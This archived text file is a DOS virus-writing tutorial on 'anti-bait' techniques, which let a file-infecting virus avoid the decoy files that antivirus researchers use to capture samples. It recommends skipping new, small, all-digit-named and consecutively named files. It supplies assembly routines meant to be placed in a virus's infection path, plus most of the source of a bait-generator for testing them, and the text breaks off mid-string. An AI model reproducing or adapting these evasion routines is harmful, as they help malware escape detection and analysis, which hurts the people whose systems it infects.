💾 Archived View for spam.works › mirrors › textfiles › virus › abaittut.txt captured on 2023-06-16 at 21:00:44.
-=-=-=-=-=-=-
Anti-Bait Technique
~~~~~~~~~~~~~~~~~~~
-HATE-YOUR-ENEMIES-
By using the methods explained in the previous section, we can
safely say that the AV can not simply set the bait maker to generate
10,000 bait files, with the virus in memory, and get an accurate and
complete of what is necessary. Instead they must use many varying files,
reboot the system thousands of times to change the date, and fiddle with
the generation counter, which will significantly slow things down. But
let us take things a step further: let us imagine that the virus won't
even infect the files in the first place. This would simply involve
putting the candidate file through a number of tests, and if it fails
any of them, saying the file could be a bait, and not infecting them.
This section simply looks at what some of these test could entail.
Anti-Bait Techniques: The Obvious
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
The are two very obvious and easy test your virus _SHOULD_ have:
1. It should not infect new files.
2. It should not infect small files.
New files should not be infected, as the files created by a bait
maker will usually look new. Simply grab the current date, and compare
it to the date stamp of the file. It is the same? Well then dont infect!
It should be noted that this is easilly defeated, if the bait maker sets
the files date stamp to a random date, before closing it.
The files created by bait makers, will usually be fairly small,
so small files should be avoided. I would recommend that you avoid files
smaller then between 5,000 and 10,000 bytes. The smaller you make this
limit, the less chance there is that a legitimate file will be wrongly
be left uninfected, but it is also more likely that a bad bait file will
wrongly be infected. By making the limit larger, the greater the chance
there is that a legitimate file will be wrongly be left uninfected, but
its also more likely that a bait file will correctly be left uninfected.
High limit or Low limit? The choice is yours... This could easilly be
defeated if the bait maker created files which were, say, 50,000 bytes.
This size is obviously far to large to avoid, as it is larger then many
legitimate programs. You should also remember however that 10,240 files
at 5,000 bytes will use 52 megabytes, so if the bait files were 50,000
bytes long, this figure would go upto 520 megabytes! Most test computers
do not have such lard hard drives, so it is safe to assume that the bait
files will be small.
As the above two methods are so easy to implement, I will not
bother to supply any example code.
Anti-Bait Techniques: Avoid Digital File Names
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Most bait makers create filenames like '00000000.com' followed
by '00000001.com'. All the file are names composed of the characters '0'
to '9'. We could have a check in our virus, to ensure that this is not
true, and if it is, not infect the file, as shown below:
------------------------------------------------------------------------
;This code avoids file names composed entirely of digits. It is assumed
;that the file has already been opened, and that its file handle is in
;BX. get_sft_bx is assumed to be a sub-procedure that returns ES:DI pointing
;to the SFT entry of the handle in BX (the file to be infected).
call get_sft_bx
mov si,di
add si,20 ;File names in at offset 20h of SFT
mov cx,8 ;8 characters in name (padded with spaces)
cld ;increment SI on LODSB
check_name:
es:lodsb
cmp al,'0'
jb name_safe
cmp al,'9'
ja name_safe ;character is not digit, so it is safe
cmp al,20 ;check for space if equal, end of name has
je not_safe ;been reached, with only digits encounters.
;which means it is possibly bait.
loop check_name ;check next character
not_safe:
jmp exit_infect ;end of name reached with only digits so
;do not infect
name_safe:
<DO NEXT BAIT CHECK or CONTINUE WITH INFECTION>
------------------------------------------------------------------------
This method could easilly be defeated by using file names like
'AAAAAAAA.COM' instead of '00000000.com'.
Anti-Bait Techniques: Avoid Consecutive File Names
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Many people consider this method overkill, but it is extremely
effective, if you are serious about your Post-Discovery-Stratagies. It
works by checking if the currents file to be infected, has a consecutive
file name of the previous filename. For example, if the previous file to
be infected was called 'AAAAAAAA.COM' you would not infect the next file
if it was called 'AAAAAAAB.COM'. The easiest way to do this, is save the
sum of the characters of the file name. If the next file is consecutive
to it, the sum will be the sum of the previous one + 1. i.e:
'AAAAAAAA' = 'A' + 'A' + 'A' + 'A' + 'A' + 'A' + 'A' + 'A'
= 208h
'AAAAAAAB' = 'A' + 'A' + 'A' + 'A' + 'A' + 'A' + 'A' + 'B'
= 209h
Therefore, of the filename of your candidate file, and use it to
check if the next file to be infected is consecutive. If it is do not
infect! Example:
------------------------------------------------------------------------
;This code avoids infecting files with consecutive filenames. It is assumed
;that the file has already been opened, and that its file handle is in
;BX. get_sft_bx is assumed to be a sub-procedure that returns ES:DI pointing
;to the SFT entry of the handle in BX (the file to be infected).
call get_sft_bx
mov si,di
add si,20 ;File names in at offset 20h of SFT
mov cx,8 ;8 characters in name (padded with spaces)
cld ;increment SI on LODSB
xor bx,bx
mov ah,0
check_consecutive:
es:lodsb
cmp al,20 ;check for space
je end_cc ;if space, end of name rached
add bx,ax ;add character to sum
loop check_consecutive
end_cc: mov ax,cs:last_sum ;the sum of the last filename
mov cs:last_sum,bx ;save the sum of this file name for next time
inc ax
cmp ax,bx
je dont_infect
<DO NEXT BAIT CHECK or CONTINUE WITH INFECTION>
------------------------------------------------------------------------
The above code is fairly lengthy, and messy, but it works! You
should also not infect a file, if it is the same length as the previous
file, for obvious reasons. This code could by defeated by incrementing
filename by values other then 1, or even by incrementing it by a RANDOM
amount each time.
To help you test your Anti-Bait code, I have put together a Bait
Generator (Sepultura's Funky Bait Maker), which can be modified to show
how each of the above methods are defeated. Here is the complete source:
------------------------------------------------------------------------
;SFBM.ASM compile with A86
;This is a bait maker that in its original state, will fail to defeat all
;of the above mentioned techniques. However, by making the modifications
;described through out the code, all of the above techniques will fail
;miserably.
;By changing the Below EQUates, and (un)commenting certain code below, you
;can test the various technique described above, as well as any other Anti-
;Bait Technique you think off..
number_of_files equ 200 ;number of bait files to genrate
file_length equ 5000 ;length of bait file. Change this to
;catchout virii that do not infect
;small files. (minimum 38, maximum
;65,279).
first_character equ '0' ;Changing these two equates to 'A' to
last_character equ '9' ;'Z' will fool virii that check if
;the filename is entirely numbers..
character_range equ (last_character - first_character)+1 ;This is used
;to calculate the
;filename..
radix 16
org 100
mov ds,cs
mov ah,9
mov dx,offset gen_msg ;prints intro message..
int 21
mov cx,number_of_files ;200 bait files
file_loop:
push cx
mov dx,offset filename
xor cx,cx
mov ax,3c02 ;CREATE/TRUNCATE "filename"
int 21
mov bx,ax ;BX = Handle. I used a MOV, so
;AH stays = to 0
mov dx,offset bait
mov cx,file_length ;file is 5000 bytes long
;Uncomment the IN, and ADD below, so the length of the bait becomes
;between FILE_LENGTH and (FILE_LENGTH + 255). This is to catchout
;virii that wont infect a file if its the same size as the last file.
;in al,40
;add cx,ax
mov ah,40 ;Write Bait Program to file..
int 21
;Uncommenting the below CALL, will cause SFBM to set each file
;to a random date, before closing, avoiding virii which dont
;infect new files.
;call set_date
pop cx
mov ah,3e ;Closes the file..
int 21
push ds
mov ax,4b00 ;This calls a execute of "filename"
;i have set up no parameter tables,
;so it will not actually execute, but
;the virus will intercept and infect.
mov dx,offset filename
int 21
pop ds
mov ah,9
mov dx,offset done ;prints:
int 21 ;DONE: XXXXXXXX.COM
std
mov si,offset units
mov di,si
next_character:
mov dl,1 ;Add 1 to file name characters.
;(00000000 -> 00000001) etc..
;Uncommenting the code below, will cause SFBM to add between
;2 and 5 to the file name characters. This will avoid virii that
;check for consecutive file names, as they are not incrementing by
;1 each time.
;cmp si,offset units ;Are we modifying a character other?
;jne not_unit ;If not, only add 1 to the character
;in al,40
;and al,3 ;Choose amount between 2 and 5 to
;add dl,al ;add..
;inc dx
not_unit:
lodsb
add al,dl ;Calculate Next File Name (increment)
cmp al,last_character + 1 ;Has it overflowed past
jb no_more_increase ;last_character? If not continue..
sub al,character_range ;else bring it back into range,
ds:stosb
jmp short next_character ;increment next char, and check for
;overflow...
no_more_increase:
ds:stosb
loop file_loop ;Do Next File (CX times)
mov ah,4c
int 21
set_date: ;Sub Procedure gives file random Date & Time.
in ax,40 ;calculates the Year for Date stamp
and ax,0f
xchg dx,ax
shl dx,9
get_month: ;calculates the Month for Date stamp
in ax,40
and ax,0f
cmp ax,0c
ja get_month
or ax,ax
jz get_month
shl ax,5
or dx,ax
get_date: ;calculates the Day of Month for Date stamp
in ax,40
and ax,1f
or ax,ax
jz get_date
or dx,ax ;DX = DATE
get_secs: ;calculates seconds of the Time Stamp
in ax,40
and ax,1f
cmp ax,1d
ja get_secs
xchg cx,ax
get_minuits: ;calculates minuits of the Time Stamp
in ax,40
and ax,3f
cmp ax,3b
ja get_minuits
shl ax,5
or cx,ax
get_hours: ;calculates hours of the Time Stamp
in ax,40
and ax,1f
cmp ax,17
ja get_hours
shl ax,0b
or cx,ax ;CX = TIME
mov ax,5701 ;set DATE/TIME stamp
int 21
ret
gen_msg db "- Sepulturas Funky Bait Maker -",0a,0d
db "Generating Funky Bait Files...",0a,0d,"$"
done db "DONE: "
filename db 7 dup (first_character)
units db first_character
db ".COM"
db 0,0d
db "$"
;This is the .COM program that will be at the start of each Bait file.
;It is 38 bytes long. The rest of the file will just be padded with
;garbage from memory.
bait: call bait_b
db 'Sepulturas Funky Bait File!